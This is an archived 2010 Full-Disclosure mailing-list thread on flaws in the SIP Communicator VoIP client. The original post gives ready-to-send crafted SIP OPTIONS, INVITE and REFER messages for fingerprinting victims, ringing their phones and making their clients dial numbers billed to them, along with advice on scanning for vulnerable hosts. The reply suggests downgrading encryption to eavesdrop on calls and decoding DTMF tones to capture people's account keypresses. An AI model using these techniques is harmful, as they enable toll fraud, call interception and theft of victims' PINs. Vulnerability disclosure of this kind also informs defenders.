[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <1888475212-1291135113-cardhu_decombobulator_blackberry.rim.net-1665252240-@b25.c3.bise7.blackberry>
Date: Tue, 30 Nov 2010 16:38:38 +0000
From: rappercrazzy@...il.com
To: "stormrider" <strmrdr42@...oo.de>,
full-disclosure-bounces@...ts.grok.org.uk,
full-disclosure@...ts.grok.org.uk
Subject: Re: SIP Communicator - or how to call 18003825968
Try this on Yahoo ;)
Also an attack I frequently used in conjunction with ethereal was to mitm and change the rtp headers to allow pcma/u and block srtp/ertp to eavesdrop on the session
Dtmf decoder can be used to decode the key punches on the phone for 401K :)
Cheers
Joshua
Sent from my BlackBerry® smartphone from !DEA
-----Original Message-----
From: stormrider <strmrdr42@...oo.de>
Sender: full-disclosure-bounces@...ts.grok.org.uk
Date: Mon, 29 Nov 2010 00:57:36
To: <full-disclosure@...ts.grok.org.uk>
Subject: [Full-disclosure] SIP Communicator - or how to call 18003825968
Salve Full-Disclosure!
There is a nice open source software floating around for VoIP
communication, namely "SIP Communicator". For phreakers phun the
developers have not taken care of much security aspects when
implementing the SIP protocol.
Now as I got bored scanning around for open 5060 ports I decided to
share my findings with you. Nice, eh?
SIP defines a whole bunch of messages to communicate with clients. Some
of the more useful for me are OPTIONS and (of course) INVITE and my
personal favorite is definitely REFER. Funny things can also happen when
using the MESSAGE type.
Short intro to SIP first...
SIP is a protocol mostly used over UDP. It has a HTTP like look and is
used for Session Initialization of VoIP communication. It is used for
signaling calls and host capabilities (i.e. supported protocols). Many
other things can be done with SIP though. If you're interested read
http://www.ietf.org/rfc/rfc3261.txt.
Now, for the quick start, SIP defines the OPTIONS message to ask a
client for what is supported and what is not. An OPTIONS request might
look like this (... means truncated for readability):
OPTIONS sip:1234567890@...fu.com SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d ...
Max-Forwards: 70
To: <sip:1234567890@...fu.com>
From: "A Friend" <sip:133713371337@...fu.com>;tag=70e763707a
Call-ID: 112071fe7c
CSeq: 63104 OPTIONS
Contact: <sip:133713371337@...fu.com>
Accept: application/sdp
Content-Length: 0
This is pretty much self-explanatory. The from-line tells who is
requesting the information, the To-line says to whom it is sent.
Now before responding *good* SIP clients check if the 'To'-line matches
the number that is really registered on the host. Well, *bad* clients
don't :-)
As you might guess this is where it begins to get phunny... really, this
is the single stupid point that makes a butterfly change the weather...
If you have a client running SIP Communicator you can easily use the
above OPTIONS sample and (no matter what 'From' or 'To' lines contain)
it will honestly answer to your request. It might respond with sth. like
(... means truncated for readability):
SIP/2.0 200 OK
To: <sip:1234567890@...fu.com>;tag=df7a2b75
Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d5d72ee20183d3d146797 ...
CSeq: 63104 OPTIONS
Call-ID: 112071fe7c
From: "A Friend" <sip:133713371337@...fu.com>;tag=70e763707a
Contact: "4461288"
<sip:4461288@....168.1.15:5060;transport=udp;registering_acc=sipgate_de>
User-Agent: SIP Communicator1.0-alpha6-nightly.build.3041Windows 7
Allow: INFO,OPTIONS,MESSAGE,BYE,REFER,ACK,CANCEL,NOTIFY,INVITE ...
Allow-Events: refer
Content-Length: 0
Not that interesting you might say. But it tells you a lot!
The "User-Agent" tells you that there is "SIP Communicator" running (and
also the version up to the last bit - crazy!). Take a closer look at the
"Contact" line. It tells you the LAN IP of the host, but don't care
about it, its useless for now. It further tells you the registrar and
the phone number that are registered on the host. In this case it's
"sip:4461288@...gate.de". Thats the host's "SIP identity". Keep this in
mind.
Before we start the real phunny things let's just ring the phone a bit.
All you need to make SIP Communicator ring is an INVITE message. As with
OPTIONS it will react to the message regardless of the 'To' and 'From'
headers. So the following message might just do the job (... means
truncated for readability):
INVITE sip:1337@...fu.com:5060;transport=udp;registering_acc=sn ...
Record-Route: <sip:p1.snafu.com;lr>
Via: SIP/2.0/UDP 127.0.0.1;branch=stupidbranchtag
From: "A Friend" <sip:133713371337@...fu.com>;tag=f5cb6e692d
To: <sip:1234567890@...fu.com>
Contact: <sip:133713371337@...fu.com>
Call-ID: 2f6633739b@...fu.com
CSeq: 102 INVITE
Max-Forwards: 70
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Type: application/sdp
Content-Length: 449
v=0
o=root 23830 23830 IN IP4 98.15.131.42
s=session
c=IN IP4 98.15.131.42
t=0 0
m=audio 35430 RTP/AVP 8 0 3 97 18 112 101
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:3 GSM/8000
a=rtpmap:97 iLBC/8000
a=fmtp:97 mode=30
a=rtpmap:18 G729/8000
a=fmtp:18 annexb=no
a=rtpmap:112 G726-32/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16
a=silenceSupp:off - - - -
a=ptime:20
a=sendrecv
a=direction:active
a=nortpproxy:yes
And it turns out, SIP Communicator happily starts ringing just as if
someone was calling.
Ok, that is way phunny but you know SIP is much more powerful. A very
interesting part of the SIP protocol defines the "REFER" message. That
is some kind of a relay message that tells a host "Please put me through
to XYZ". Again, this a very useful feature of SIP but only when the VoIP
software acts carefully when receiving these messages. As mentioned
before, "SIP Communicator" doesn't handle that very restrictive. In
contrast to an INVITE message "SIP Communicator" needs correct values
for the sip-ID of the host it resides on. So for constructing a valid
REFER request we need the users sip-ID. Remember the OPTIONS message and
the "Contact" line in its response? We already got the ID! With these
infos and some enclosure we can construct a REFER request that lets SIP
Communicator call an arbitrary telephone number. We use the origins
sip-ID for REFER and Contact lines and construct a sip-ID from the phone
number to call and the SIP provider of the client in the "Refer-To"
line. We might want call the number 1-800-FUCKYOU (that is 18003825968):
REFER sip:4461288@...gate.de SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4;branch=31f175a7e2d ...
Max-Forwards: 70
To: <sip:4461288@...gate.de>
From: "A Friend" <sip:133713371337@...fu.com>;tag=ae894a32e8
Call-ID: 5fae3cc039
CSeq: 93809824 REFER
Contact: <sip:4461288@...gate.de>
Refer-To: sip:18003825968@...gate.de
Content-Length: 0
If you then get an answer that says "SIP/2.0 202 Accepted" you got it.
- PLEASE - be advised, that calling a number from someones SIP phone
might generate costs on his bill. If the user using SIP Communicator has
a prepaid account it might not even work if you try to call so. on the
landline and there is not enough money available to make that call.
Be nice and don't spend other people's money!!
There are not much SIP Communicator installations around that are
reachable over the inet and so you can hardly find some hosts to attack.
Instead you may find many other products responding to probes but as far
as I can tell they are all much better protected.
Anyway, scanning for vulnerable hosts is an easy task because we're
using UDP. No three-way-handshake and nasty things. Just send and forget.
Maybe it is just the right time to dive deeper into SIP and VoIP things.
New applications come out each day, the industry around that sector
grows and grows and SS7 and companions are still underdeveloped.
keep on phrocking,
stormrider
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists